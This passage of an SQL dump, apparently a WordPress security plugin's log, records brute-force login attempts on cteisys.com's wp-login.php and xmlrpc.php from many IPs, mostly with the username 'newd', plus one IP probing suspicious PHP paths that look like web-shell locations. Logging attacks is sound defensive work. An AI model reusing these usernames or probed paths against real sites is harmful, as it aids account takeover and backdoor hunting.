-login.php',0,0,0),('59.110.33.253',997073405,'newd',0,1664563339.2068,7,'AuzGlM6mBpx04sH8vR2jhP3E','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('216.250.116.85',3640292437,'newd',0,1664563348.0113,7,'JGQedBuLf3rAqIvi8W9So1kT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.242.115.115',804418419,'newd',0,1664563352.9053,7,'qdwuZh3oig5lAOzbHLe78jVC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.107.113.246',3110826486,'newd',0,1664563359.4167,7,'PYcF28TURDyGvMrE147ftxph','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.184.155.89',1505270617,'newd',0,1664563360.0887,7,'YRs3mEDjBJMoZzivlIfynCtN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.28.3.42',773587754,'newd',0,1664563363.4328,7,'ZUgizbWlKBTrPsf7qxd3Sm05','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.21.74',2884900170,'newd',0,1664563524.6957,152,'cGuL2g6VKqk9NoYSAfOPlWzn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.106.35.235',2540315627,'newd',0,1664564182.2104,152,'1QoTH2mkBgzMCrpLOjUJhl7I','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.165.237.48',3584421168,'newd',0,1664564423.5823,152,'G8petuBjCEomJXgFLhlbZPqW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.219.142',2671893390,'newd',0,1664564616.1600,152,'5vsVo7YU1wKQX9Rpe04CrycF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.154.69.85',3097118037,'newd',0,1664564862.4402,152,'EXOtePLV9y3678drbFWIgiTY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.12.67.132',1024213892,'newd',0,1664565298.7498,152,'lyd9cMJuYVxIwLhQB4Gvn5NH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.210.102.36',148006436,'newd',0,1664565489.6709,152,'xe2KitXrCTGMkljPfgQyVW0L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.107.177.243',3194728947,'newd',0,1664565742.5656,152,'2Kmq7l5g3IQSp0M9sa6G8k4T','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.154.184.152',1738193048,'newd',0,1664565943.0100,152,'8t1yoCa0bDPTL7zVElrKWxYs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.99.69.189',2338538941,'newd',0,1664566408.8871,152,'f0CKoGEQ1rOxmqvVITclHLUD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.152.164.103',1738056807,'newd',0,1664566646.0843,152,'AJZOdIbP5Ck4so7aWvSpXjN1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.131.189.63',1753464127,'newd',0,1664566856.3217,152,'SP08ZuROWrgkz6NBpcCidlsa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.57.186.73',792312393,'newd',0,1664567103.5731,152,'GlJ5jzWxpugndKfqFX96k3Qv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.197.195.173',3116745645,'newd',0,1664567580.9317,152,'A1QNDTsudrq6gB5MXFZmwc7p','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.146.199',867340999,'newd',0,1664567684.7783,7,'QtREjdch5G7KmwLBZTIV1FNe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.127.106.229',2155834085,'newd',0,1664567685.5748,7,'Nc4Bh3kTv6Van5GeH1QIf9ZK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('115.165.166.192',1940235968,'newd',0,1664567692.0290,7,'McafxN6Z58SDVowmzhL7sWJl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.15.68',2884898628,'newd',0,1664567692.7977,7,'Oxdlh7FZEo08pNmv6TJaIGPt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('43.252.230.8',737994248,'newd',0,1664567701.0910,7,'SJsWM7tkyGxTLEKv9pB32UZQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('115.165.166.192',1940235968,'newd',0,1664567710.7202,7,'IzD9shdajeF8icS7BV3YNLXl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.88.52.216',1364735192,'newd',0,1664567710.9178,7,'qsnFUbyOTc0zSt8l79mZYjCE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.233.5.168',1508443560,'newd',0,1664567720.5314,7,'dNoamWpyPBQbq7Y9seTXRiJr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.67.104.40',3494078504,'',0,1664567727.8756,55,'A0BhjVg2zrP7yQSGOka1ebFs','','19|0|0|0|cteisys.com/wp-includes/class-index-wordpress.php',0,19,0),('138.201.61.46',2328444206,'newd',0,1664567738.0153,7,'ywgMhUI60ZX572QfjiHVD1Ev','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('216.245.215.122',3639990138,'newd',0,1664567751.6234,152,'CR9Q71IbSEpLDXo2KH8YBvla','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.67.104.40',3494078504,'',0,1664567753.4209,55,'y12J0xNtuCe7hHGMfXs9vcFr','','19|0|0|0|cteisys.com/wp-admin/js/widgets/wp-login.php',0,19,0),('208.67.104.40',3494078504,'',0,1664567779.3710,55,'JSqNU2H6ouPLj0etMwmGgB1Z','','19|0|0|0|cteisys.com/wp-includes/wp-system-cloud.php',0,19,0),('208.67.104.40',3494078504,'',0,1664567836.5036,55,'ucObPMkUaq7Q3VBe0NyZ8pAr','','19|0|0|0|cteisys.com/wp-includes/class-wp-page-icon.php',0,19,0),('208.67.104.40',3494078504,'',0,1664567857.6048,55,'5NR73Sae2EmQzydV6lvuH8FJ','','19|0|0|0|cteisys.com/wp-includes/class-wordpress-license.php',0,19,0),('208.67.104.40',3494078504,'',0,1664567857.6071,10,'5NR73Sae2EmQzydV6lvuH8FJ','','707|0|0|0|cteisys.com/wp-includes/class-wordpress-license.php',0,707,0),('150.95.112.79',2522837071,'newd',0,1664568238.3473,152,'wJbWvOAL3KXCxrunEYe25lRV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.219.251.247',1759247351,'newd',0,1664568499.9276,152,'hqSW8if2TR3UyXYCOt51aMIQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.216.37',2806503461,'newd',0,1664568690.4218,152,'wQH7Re9ublFjYvL0aSAhmqO3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.150.28',1868207644,'newd',0,1664568964.0382,152,'RCjw0AaL6dNsKDc3kgZpWPv8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('172.105.42.19',2892573203,'newd',0,1664569178.4561,152,'3mDa07gU1iNA8jwMoBxSvkdc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.252.31.179',3120308147,'newd',0,1664569439.4590,152,'gF8cZyaXwmTsVOj4YP5CzSqB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.209.0',2487800064,'newd',0,1664569656.7314,152,'aosMp1gxZ9K8HXyfIL3C0b7d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.92.159.48',3193741104,'newd',0,1664570134.0371,152,'3sb8aOXwo47y0tuUFcmIlQEk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.229.214.93',786814557,'newd',0,1664570401.5324,152,'XvYtrMoLDpPjFI0sU3b7yKGV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('1.116.44.97',24390753,'newd',0,1664570597.1575,152,'t8dhczGBJX6AnHsqIjuyVDSU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.110.84.132',1735283844,'newd',0,1664570883.3766,152,'qHVn2wjoN3OGexUQcYgKpas9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.219.250.15',2732325391,'newd',0,1664571078.2917,152,'H07zEdtCmg5OlBvqFf2MDV1G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.215.217.77',2732054861,'newd',0,1664571567.0539,152,'lf9Zs1vAO3U8tXIY0Kpkom4M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.98.102.187',2372036283,'joyce',0,1664571819.6025,152,'2mWunEQOBPhaM4FfjkloZtSw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.38.163.180',2586223540,'newd',0,1664571825.8213,152,'tIoLjc42kHJfTMX0sr9uUbRp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.12.250.252',3322739452,'newd',0,1664572053.6664,152,'RIvGtX9FEzesThlPYDLyVgdj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.152.164.103',1738056807,'newd',0,1664572308.1036,152,'b5waum6qLoyQS9zEiHX18TrZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.0.165.146',2583733650,'newd',0,1664572797.3015,152,'3oSrzQec4VMtEH8Lig5Xf7Z6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.105.240',2261871088,'newd',0,1664573002.1747,152,'cQ0g67vTPjqfH83LmYnlXIpO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('40.122.149.171',679122347,'newd',0,1664573293.4892,152,'rZ1mqOpW6xQ28MogtJCzfBPX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.211.94.153',601054873,'newd',0,1664573772.4632,152,'sIV45ynRreT6A1uZKjYd230F','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.76.135.117',223119221,'newd',0,1664573972.4570,152,'RDbojye5XVPUGqBsICvl4hJm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.66.145.163',2487390627,'newd',0,1664574173.4524,7,'1qHzLCUBefu8r9nRYNvJlIA4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('78.47.46.81',1311714897,'newd',0,1664574181.4957,7,'HwZV9h2giM0GNEPXOJ8C3pRU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.251.216.88',1761335384,'newd',0,1664574183.7652,7,'PMEmUy1wrV5Lx92sgXcjWGq4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('182.79.46.50',3058642482,'newd',0,1664574185.5527,7,'6VIiOLqFXQGPCojmnwA1ubTk','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.15.68',2884898628,'newd',0,1664574194.2866,7,'REaQ38hqnxbSzMoHAcV7pdZO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.27.156.245',3256589557,'newd',0,1664574197.7263,7,'msCvAIcYiN4MnWGlUt8JLQXk','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.66.145.163',2487390627,'newd',0,1664574199.5372,7,'MlT4Wt6Cz75skwYXmB1Db0oQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.46.109.113',1496214897,'newd',0,1664574212.0117,7,'wV1RXAcaoJNm4WYCDOEvlj9k','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.245.71.145',2650097553,'newd',0,1664574213.8228,7,'6Cjhl1A7fBWwZ9Mxmb5EDJsR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.99.34.140',3227722380,'newd',0,1664574260.8092,152,'OPTIds6KhxNY7Be0g4cEyUrZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.212.34.36',3168018980,'newd',0,1664574473.5152,152,'KdnH8jWqcR9DUTIrZpPLFJVu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('196.44.176.39',3291263015,'newd',0,1664574740.9668,152,'gNcTPb23H7nIiolS6tMZqsQ9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.79.8.125',2018445437,'newd',0,1664575441.5667,152,'KnUtYGJwPsSvzqe0hcxlfVHi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.104.66.61',795361853,'newd',0,1664577204.1223,152,'XVZD3bxMQ1BYOg4JCHePsutG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.211.94.153',601054873,'newd',0,1664577395.2983,152,'Myt7SqGPkRwvOJNg6hC3uXEK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.225.33.99',3118539107,'newd',0,1664577695.7901,152,'DUv6ZYG4CNTxHsV9h1WyESKa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.156.175.51',3114053427,'joyce',0,1664578145.7947,152,'OIu3g5qav16GDAKch8NXyWLJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.201.41',2916403497,'newd',0,1664578162.0742,152,'QTuxO7RgdYDJ0Hm4yZUftXbh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.75.221.59',3091979579,'joyce',0,1664578189.9662,152,'ZlHhjLFnp8EN6Y2cko7BItW9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.157.241',90545649,'newd',0,1664578404.7306,152,'lPcHzdpMXnBQk1TxU5NtFAeZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1664578655.2461,152,'oPkX3tEfc419YFCrySgu6wql','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.176.167.92',582002524,'newd',0,1664579928.4920,7,'ftjmu6h4QygBRMiLaxI0C2zd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('115.165.166.192',1940235968,'newd',0,1664579935.5682,7,'lBvPyCAf6bRW8KjmNEVSwZzi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.114.245.109',3111318893,'newd',0,1664579939.1225,7,'FBaNJiUwuOs7vYjycMt5qlVA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('144.202.93.42',2429181226,'newd',0,1664579957.7996,7,'1ZGd7LEHPckwvAe5TWunCbVh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.223.119.187',2682222523,'newd',0,1664579966.0030,7,'OeHma7QTnK2yN68dDZE5hAL1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('52.178.114.226',884110050,'newd',0,1664579969.3452,7,'gr1LE97bS0tzOsji8kNPT23d','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.171.180.165',1739306149,'newd',0,1664580170.8750,152,'mv53TFGdspRPNkfJcHYlOyDB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.235.138.120',267094648,'newd',0,1664580366.4316,152,'uKnl1jqrtGQTfVIiM3LwJmHs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.101',3583549797,'joyce',0,1664580433.4784,152,'PUZfSCsDOWa5G9AJtn1Ij0QX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.92.27.198',1734089670,'newd',0,1664580870.6485,152,'iXgtyYdnUfGeMC63paRFWSK0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('122.17.148.164',2047972516,'newd',0,1664581141.9014,152,'Ha8igxf42yKLd1wYJzIXAWvS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.254.90.187',1761499835,'joyce',0,1664581331.3997,152,'bEPGZrnXK7A8as0myQt4S9F3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.255.62.28',2516532764,'admin',0,1664582566.7369,152,'0K3Ido7ayY4XuVigDEfNAORh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.106.35.235',2540315627,'newd',0,1664584612.5837,152,'rPmS1EiQgWnRlJxhH4VT0L72','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'newd',0,1664584892.9217,152,'Ti5LgcPIlNoGMeOKa1E46hWU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.213.249.210',2731932114,'newd',0,1664585299.7029,7,'N5ARnTOqzHGKWUkohaLZy4i3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('200.150.202.196',3365325508,'newd',0,1664585299.8911,7,'MLRoBDuk4dz95YXxVbEyFAqC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.223.119.187',2682222523,'newd',0,1664585312.3234,7,'16qSD3GnrcAd2zVOaxKwIFYg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.251.216.88',1761335384,'newd',0,1664585312.7225,7,'g3CplzJexM7nHsvcKd4t6fSE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('200.150.202.196',3365325508,'newd',0,1664585319.1674,7,'ifJ1ruTQ8SN7WYbpe6CA4lRa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('125.212.229.33',2111104289,'newd',0,1664585325.5951,7,'Er56fyb1Nmc7wa0pHToVY9Ih','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.127.4.124',763298940,'newd',0,1664585328.1351,7,'9JROiA7PupLF2CaVGEz4fo6g','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('84.22.153.127',1410767231,'newd',0,1664585336.0039,7,'Fm81pMjlLwvOq3NPaXKB9zok','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('115.165.166.192',1940235968,'newd',0,1664585336.5951,7,'OCi8kXcwEMQZRzNDgL13FnTo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.224.36.205',400565453,'newd',0,1664585345.0843,7,'8UrY0ID5CwZ2dMTu7kc6K3Rj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.21.74.40',3642051112,'newd',0,1664585347.9472,7,'8QUbuKYxiqVnZEzA9dJe1o0v','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.88.52.216',1364735192,'newd',0,1664585352.8033,7,'UDwudlN7eiVb0SK9Lk38Rpos','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.88.52.222',1364735198,'newd',0,1664585353.4591,7,'cgbadpjB4sS9uqD0UiKQ716A','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.245.71.145',2650097553,'newd',0,1664585372.5398,7,'bpAn5Tewg17ozhBEJy4xZF68','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.223.36.152',1876894872,'newd',0,1664585394.2749,152,'0Hc3YZobTOdUKIg4PSBsGzEl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.223.36.152',1876894872,'newd',0,1664585640.8853,152,'FoN7Mr6gGZJVOKxd0zuSWPfy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.206.225.59',3117343035,'joyce',0,1664585893.5417,152,'5DIu3xLO0CXB1lRHT2a7GN8S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.247.139.21',3120007957,'newd',0,1664585944.8775,152,'q6WxM7Xb9jeOahC1HNkfYZJU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.0.140.186',2634058938,'newd',0,1664591019.9461,152,'zau2J5clHNWxORrtgEAFdSPj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1664591071.1987,7,'fm7FveLBi0hzUrbkypns5EZ8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.0.140.186',2634058938,'newd',0,1664591320.2306,152,'ADexoRKfQI6ByM0mq1nZStuL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.13',3103917581,'newd',0,1664591618.2610,7,'bfpQP8Xz3rS4m5TvsLJDnkVl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.250.202.147',3120220819,'newd',0,1664591619.3485,7,'ZhLsNwx1Cr54JmdGgk3qEt2H','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.46.109.113',1496214897,'newd',0,1664591630.4885,7,'art8Igj1kGvzVJYh5TR03UpX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('84.22.153.127',1410767231,'newd',0,1664591634.2567,7,'Oml17p0GUvE3icdyjJbgoTSK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.21.74.40',3642051112,'newd',0,1664591643.5378,7,'8jbcpwDkgqrGi0h41ItYUsXF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.226.80.84',786583636,'newd',0,1664591644.2211,7,'vDVYlp1obKSuGZPzJjWHgaUF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.245.71.145',2650097553,'newd',0,1664591644.7365,7,'n9BNerYGU75PcADiqIES38lR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('144.202.93.42',2429181226,'newd',0,1664591648.7480,7,'tAXrx8nLS6D9TlGup7kOIdWV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.250.202.147',3120220819,'newd',0,1664591652.8235,7,'icAa69RlY4tnx5ehkCguTQSv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('59.110.33.253',997073405,'newd',0,1664591658.0236,7,'TaWZw2XvmyHECM5kPcVeG03p','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.68.11.239',860097519,'newd',0,1664591682.0418,7,'R1z45tshIEfmFTpw7iqx0AWB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.215.217.77',2732054861,'newd',0,1664591858.0133,152,'nC0BsvSI38YXuk69rxWl4dUo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.216.181',2717964469,'newd',0,1664592082.0990,152,'XGBzyucOC6TnN50kZSigQHaw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.106.15.209',661262289,'newd',0,1664592409.7273,152,'u0tXpy6PgzIoEfUHx4LbK3dC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.112.202.112',3245394544,'newd',0,1664592627.6011,152,'o9E2XwcPzvOHN6teg8fDW17S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.20.111',2335904879,'newd',0,1664592955.4545,152,'Jv3aI5B0Rt1pFYuA9GScbUkr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.8.58.8',1997027848,'newd',0,1664595176.8319,152,'TYS2XPezZqfIGBgUu3HkVb6Q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.253.222',2733768158,'newd',0,1664595366.8743,152,'q1P7GNSLtvJDoCxgmRHVkA6j','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.200.116.211',3116922067,'joyce',0,1664595535.6785,152,'Xw8vLKQi9T1IZyzBWG0DtUn3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.248.44',3488938028,'newd',0,1664595535.6815,152,'KM45SC2AO0onlDrFBJp8sIzk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.33.197.207',3558983119,'newd',0,1664595714.6703,152,'rePMZDEUhsX81FWCnpKHNtoa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.79.8.125',2018445437,'newd',0,1664595852.7049,152,'Zhn52qrz0YoRMlx3dTatFij8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.165.237.48',3584421168,'newd',0,1664596185.5719,152,'bMrCSRABPsNQqil8zJ3vdWf0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.68.97.70',574906694,'newd',0,1664596322.5749,152,'2Qz9d0C4WiwR5yI7rUuxSMBY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.249.230.22',3355043350,'joyce',0,1664596456.2261,152,'ibsd37XOmQgn0pEyStkJDKW2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.18.54.11',1997682187,'newd',0,1664596526.9778,152,'mPkCc8QuGrtX2DZi4NAwI6ze','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.71.145',2650097553,'newd',0,1664597504.7170,7,'zIPqFwL3dahBleCyYv1fkK6g','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.86.176.182',1733734582,'newd',0,1664597505.8924,7,'31T0soOlVkEbY4ghfRGAXUdi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.86.176.182',1733734582,'newd',0,1664597507.1343,7,'NK7WnqUp5VZsSmlw8GHcjey6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('91.204.46.118',1540107894,'newd',0,1664597514.4654,7,'kM4sxJ6HF5Gr12WoKleSqLnp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.114.185.159',2809313695,'newd',0,1664597525.6100,7,'XP8OvhbTLNgCI1xDF4RAcqjm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.86.176.182',1733734582,'newd',0,1664597526.6621,7,'oHU9G2Yp7qnswibhIBcCPgTJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.207.63',2160578367,'newd',0,1664597532.2346,7,'KleBktDqpwSU0LT78cr13ER2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('202.61.232.79',3393054799,'newd',0,1664597545.4542,7,'TQfgqt6VI3JarucWybsBiXe1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.74.118.242',1732933362,'newd',0,1664597800.8317,152,'UBRL1oOS5lxczajNk26Pg0Ai','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.125.239.179',763228083,'newd',0,1664597940.3104,152,'LNUXBxtTp94Mg8YePRlndsZk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.201.41',2916403497,'newd',0,1664598151.2259,152,'zX0Hnm6WP7L8YipVFj5a9IG4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1664598270.9917,152,'JI2NMmgfByVYPbiWts9QRw3x','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.248.44',3488938028,'newd',0,1664598459.2315,152,'9dW0x4QyERvu3szI1FelLAX7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.69',3583549765,'joyce',0,1664598561.0181,152,'ksIE64xBmPJF5MfrKzCDRqwp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.153.8.103',3113814119,'newd',0,1664598780.1296,152,'hOl7I0bm3T84aQyDCJwGEeko','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.149.103.132',3583338372,'newd',0,1664598910.8002,152,'3H20XmIGL4wPdQcA6Zn5eM9h','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.125.239.179',763228083,'newd',0,1664599207.3529,152,'wuCavLe6TtZF41WOs7XlQp8c','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.225.94.95',601972319,'newd',0,1664599379.2241,152,'OsnJrgeK9GLAYNtTS4Z3PmUu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.38.163.180',2586223540,'newd',0,1664599482.3819,152,'W7iNAHK4vy8d65tbrF1noYqB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('144.126.159.4',2424217348,'newd',0,1664599789.3798,152,'hOfV8l3NC9WLI2dn5MeFyE7S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.146.202.150',1737673366,'newd',0,1664599934.2896,152,'p0oxeEYw1i5DfJGm7PTRVMZI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.225.94.95',601972319,'newd',0,1664600067.3615,152,'Y5O7cWwukqhFnK0JTN8xVUtS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.57.186.73',792312393,'newd',0,1664600213.1560,152,'QUBvrf1s0NwP45z6RpiTHj7M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.234.161.93',1844093277,'newd',0,1664600367.3750,152,'bYZFo27JrdeiWK8wQGyDPN0E','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.222.68.53',1558070325,'newd',0,1664601777.5667,152,'WE5hIDTN49R7YgOK3PxA26nc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.136.93.169',3582483881,'newd',0,1664602249.4001,152,'ftMONSXg7iah230ZQGFWRv1e','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.227.127.195',2112061379,'newd',0,1664602506.4923,152,'hH0N9wUka2q16mDeA3QTYoIs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.53.17',1364735249,'newd',0,1664602653.2337,152,'gsf15t4qwIcaoLHBXJzuv7k0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.237.121.70',233666886,'newd',0,1664602807.9861,152,'WT0fZSvKDgp3QqaeXxdJRIyh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('144.202.93.42',2429181226,'newd',0,1664603085.1633,7,'cQxYq7OtKpTIR9HhZsV12B4D','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('144.202.93.42',2429181226,'newd',0,1664603108.8246,7,'6Rmv192JzBLAqecUtdHSpICF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.46.109.113',1496214897,'newd',0,1664603109.1462,7,'1F5mrKf7yecz23BnkgsMQapC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.74.145.155',1347064219,'newd',0,1664603123.3989,7,'Kxo5SRksUEmIX3rDCW6le1Qa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.28.3.42',773587754,'newd',0,1664603124.1402,7,'OgKVDxbp9d7JyM164uLa0lIU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.250.202.147',3120220819,'newd',0,1664603132.3551,7,'357O0cRFa9USztKE6sZqjC1l','','0|0|0|0|cte